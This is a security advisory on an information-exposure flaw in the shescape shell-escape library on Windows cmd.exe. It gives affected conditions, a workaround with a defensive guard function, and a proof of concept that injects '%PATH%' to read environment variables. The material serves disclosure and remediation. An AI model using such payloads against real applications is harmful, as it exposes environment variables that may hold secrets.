Information Exposure Affecting shescape package, versions <1.7.1


0.0
medium

Snyk CVSS

    Attack Complexity Low

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.05% (19th percentile)
NVD
4.3 medium

  • Snyk ID SNYK-JS-SHESCAPE-5734237
  • published 23 Jun 2023
  • disclosed 22 Jun 2023
  • credit Unknown

How to fix?

Upgrade shescape to version 1.7.1 or higher.

Overview

shescape is a simple shell escape library.

Affected versions of this package are vulnerable to Information Exposure such that an attacker may be able to get read-only access to environment variables.

Note:

This impacts users of Shescape:

  1. On Windows using the Windows Command Prompt (i.e. cmd.exe), and
  2. Using quote/quoteAll or escape/escapeAll with the interpolation option set to true.

Workaround

Users who are unable to upgrade to the fixed version can remove all instances of % from user input, either before or after using Shescape.
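
The workaround above as a guard applied to user-supplied arguments, shown as an added example rather than code from Snyk or the Shescape project. The function names are hypothetical, and the fallback to ComSpec when no shell is set is an assumption based on Node's default shell on Windows.

```javascript
// Added example; function names are hypothetical, not part of Shescape.

// Condition 1 from the note: Windows with cmd.exe as the shell. With `shell`
// unset, the default is assumed to be ComSpec (or cmd.exe) on Windows.
function shellIsCmd(options, platform, env) {
  if (platform !== "win32") return false;
  const shell = typeof options.shell === "string"
    ? options.shell
    : env.ComSpec || "cmd.exe";
  return /(^|[\\/])cmd(\.exe)?$/i.test(shell.trim());
}

// Condition 2: quote/quoteAll, or escape/escapeAll with interpolation: true.
function callIsAffected(fnName, options) {
  if (fnName === "quote" || fnName === "quoteAll") return true;
  if (fnName === "escape" || fnName === "escapeAll") {
    return options.interpolation === true;
  }
  return false;
}

// Workaround: remove every "%" and record which arguments were changed so
// the caller can log or reject them.
function stripPercent(args) {
  const changed = [];
  const clean = args.map((arg, i) => {
    const out = String(arg).replace(/%/g, "");
    if (out !== String(arg)) changed.push(i);
    return out;
  });
  return { clean, changed };
}

// Apply the workaround only when both conditions hold.
function guardArgs(fnName, args, options, platform, env) {
  if (shellIsCmd(options, platform, env) && callIsAffected(fnName, options)) {
    return stripPercent(args);
  }
  return { clean: args.map(String), changed: [] };
}

// Constructed sample input: the second argument mimics the PoC payload.
const sample = guardArgs("quoteAll", ["report", "%PATH%"],
  { shell: "cmd.exe" }, "win32", { ComSpec: "C:\\Windows\\System32\\cmd.exe" });
console.log(sample);
```
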

PoC

import * as cp from "node:child_process";
import * as shescape from "shescape";

// 1. Prerequisites
const options = {
    shell: "cmd.exe",
    // Or
    shell: undefined, // Only if the default shell is CMD

    // And
    interpolation: true, // Only applies to `escape` and `escapeAll` usage
}

// 2. Attack (one of many)
const payload = "%PATH%";

// 3. Usage
let escapedPayload;

escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);

// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);

// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable